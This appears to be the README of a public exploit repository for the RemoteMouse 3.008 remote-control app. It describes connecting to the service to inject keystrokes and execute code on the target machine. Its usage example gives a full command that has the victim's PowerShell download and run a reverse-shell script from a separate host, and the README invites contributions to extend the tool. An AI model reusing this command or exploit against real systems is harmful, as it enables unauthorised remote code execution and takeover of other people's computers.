The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.
poc.mp4
./RemoteMouse-3.008-Exploit.py --target-ip --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""
Pull requests are welcome. Feel free to open an issue if you want to add other features.